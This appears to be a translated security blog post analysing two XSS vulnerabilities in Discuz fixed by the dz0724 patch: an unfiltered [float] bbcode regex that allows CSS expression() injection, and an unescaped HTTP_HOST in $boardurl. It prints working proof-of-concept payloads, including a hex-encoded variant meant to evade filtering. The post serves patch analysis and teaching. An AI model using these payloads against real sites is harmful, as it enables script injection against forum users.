One XSS fixed by the dz0724 patch, plus another XSS it fixed

Source: Internet
Author: User
Tags: bbcode

Diffing against the patch, we find in \include\discuzcode.func.php:

$discuzcodes['searcharray']['bbcoderegexp'] = array(  // the regular expressions for the tags

    "/\[align=([^\[\<]+?)\]/i",   ----> before patching
    "/\[float=([^\[\<]+?)\]/i",
    |
    V
    "/\[align=(left|center|right)\]/i",   ----> after patching
    "/\[float=(left|right)\]/i",

Continuing on, the following code is what produces the HTML for those two tags:

$discuzcodes['replacearray']['bbcoderegexp'] = array(  // the replacement strings for the regular expressions

    ........
    "<p align=\"\\1\">",
    "<br style=\"clear: both\"><span style=\"float: \\1;\">",

The code that performs the replacement:

$message = str_replace($discuzcodes['searcharray']['bbcodestr'],
    $discuzcodes['replacearray']['bbcodestr'],
    preg_replace(
        ($parsetype != 1 && $allowbbcode == 2 && $GLOBALS['_DCACHE']['bbcodes'] ? array_merge($discuzcodes['searcharray']['bbcoderegexp'], $GLOBALS['_DCACHE']['bbcodes']['searcharray']) : $discuzcodes['searcharray']['bbcoderegexp']),
        ($parsetype != 1 && $allowbbcode == 2 && $GLOBALS['_DCACHE']['bbcodes'] ? array_merge($discuzcodes['replacearray']['bbcoderegexp'], $GLOBALS['_DCACHE']['bbcodes']['replacearray']) : $discuzcodes['replacearray']['bbcoderegexp']),
        $message));

After testing, it turns out that $message has already been run through htmlspecialchars or a similar function before it reaches str_replace, so neither " nor <> can be used.
This means the align replacement "/\[align=([^\[\<]+?)\]/i" --> "<p align=\"\\1\">" cannot be exploited, since that would need a quote or an angle bracket. Let's look at the float tag again:

"/\[float=([^\[\<]+?)\]/i" --> "<br style=\"clear: both\"><span style=\"float: \\1;\">"

After replacement, \1 lands inside the span's style= attribute. Haha: an expression() inside style= needs neither a closing quote nor <>.

Test code:

[float=expression(alert(123456789))]test[/float]

The above is just a basket. Considering that many gurus have BS for it, there are indeed situations where the basket cannot be used, because alert(123456789) contains no special sensitive characters. Look again at "/\[float=([^\[\<]+?)\]/i": the captured group receives no special filtering at all; only $message is passed through htmlspecialchars before the replacement.
Therefore it is fully usable, e.g.:

[float=\65\78\70\72\65\73\73\69\6f\6e\28\61\6C\65\72\74\28\31\32\33\34\35\36\37\38\39\29\29]test[/float]

But I still play the basket :).
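To make the effect of the patch concrete, here is an added example (not Discuz's own code) that re-implements the [align]/[float] handling from the page in a few lines of PHP, with the pre-patch capture regexes beside the dz0724 whitelist regexes. The order matches what the page describes: $message goes through htmlspecialchars() first, then the bbcode regexes run. The inputs are constructed; the non-keyword probe uses a neutral value rather than the payload above.

```php
<?php
// Added example, not Discuz's code: minimal model of the bbcode step for
// [align] and [float], used to compare the regexes before and after dz0724.

// Replacement strings exactly as shown on the page.
$replace = array(
    "<p align=\"\\1\">",
    "<br style=\"clear: both\"><span style=\"float: \\1;\">",
);

// Before the patch: any run of characters other than '[' or '<' is captured
// and copied verbatim into the attribute value.
$searchBefore = array(
    "/\[align=([^\[\<]+?)\]/i",
    "/\[float=([^\[\<]+?)\]/i",
);

// After the patch: only the fixed keywords are accepted, so the attribute
// value can never be anything but one of them.
$searchAfter = array(
    "/\[align=(left|center|right)\]/i",
    "/\[float=(left|right)\]/i",
);

// Mirrors the order the page describes: htmlspecialchars() runs on the whole
// message first, then the tag regexes are applied to the escaped text.
function render_bbcode($message, array $search, array $replace) {
    $message = htmlspecialchars($message);
    return preg_replace($search, $replace, $message);
}

// Constructed inputs: a legitimate tag, and a probe whose value is not a
// keyword but contains no character htmlspecialchars() would touch.
$inputs = array(
    '[float=left]text',
    '[align=center]text',
    '[float=not(a:keyword)]test',
);

foreach ($inputs as $in) {
    echo "input : $in\n";
    // Pre-patch: the probe's value lands inside style="float: ...;" unchanged,
    // because '(', ')' and ':' survive htmlspecialchars().
    echo "before: " . render_bbcode($in, $searchBefore, $replace) . "\n";
    // Post-patch: the probe does not match, so the tag is left as plain text.
    echo "after : " . render_bbcode($in, $searchAfter, $replace) . "\n\n";
}
```

The point the comparison makes is the one the page makes: escaping the whole message is not enough when the regex later copies a captured substring into a CSS attribute, since the characters a style value needs are not HTML-special. Restricting the capture to a fixed whitelist removes the attacker-controlled value entirely, which is why the patch changes the regex rather than adding more escaping.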

Afterword: some of the code in DZ's discuzcode is really poorly written [I mean code style]. I guess the person in charge of code security at DZ is also depressed; is the vulnerability invisible? Pure speculation... However, black-box testing for XSS is more convenient than reading the code. [Some people will be very happy to see this.]

Another XSS fixed by the dz0724 patch

\include\common.inc.php:

$boardurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/';   ----> before patching
|
V
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');   ----> after patching
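The two $boardurl constructions side by side, as an added example (not Discuz's code), fed constructed $_SERVER values so the difference is visible without a running forum. HTTP_HOST is whatever the client put in the Host header, so the third case has a double quote in it; the function names and the sample hosts are this example's own.

```php
<?php
// Added example, not Discuz's code: the pre- and post-patch $boardurl
// expressions from the page, wrapped in functions so they can be compared
// on the same input.

// Pre-patch form: the host header is concatenated into the URL as-is.
function boardurl_before($host, $php_self) {
    return 'http://' . $host
        . preg_replace("/\/+(api|archiver|wap)?\/*$/i", '',
                       substr($php_self, 0, strrpos($php_self, '/')))
        . '/';
}

// Post-patch form: the same value, passed through htmlspecialchars() once,
// so any quote or angle bracket in the host reaches the page encoded.
function boardurl_after($host, $php_self) {
    return htmlspecialchars(boardurl_before($host, $php_self));
}

// Constructed inputs: two ordinary requests (the second shows the regex
// stripping a trailing /archiver segment) and one with a quote in Host.
$cases = array(
    array('forum.example.test',  '/bbs/index.php'),
    array('forum.example.test',  '/bbs/archiver/index.php'),
    array('forum.example.test"', '/bbs/index.php'),
);

foreach ($cases as $c) {
    list($host, $self) = $c;
    echo "Host: $host  PHP_SELF: $self\n";
    echo "  before: " . boardurl_before($host, $self) . "\n";   // quote kept
    echo "  after : " . boardurl_after($host, $self) . "\n\n";  // quote -> &quot;
}
```

For the first two cases both forms give http://forum.example.test/bbs/; for the third the pre-patch form yields http://forum.example.test"/bbs/ while the patched form yields http://forum.example.test&quot;/bbs/. Encoding once at construction is defensible here only because $boardurl is emitted into HTML; the general rule is still to encode at the point of output for the context it is used in.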
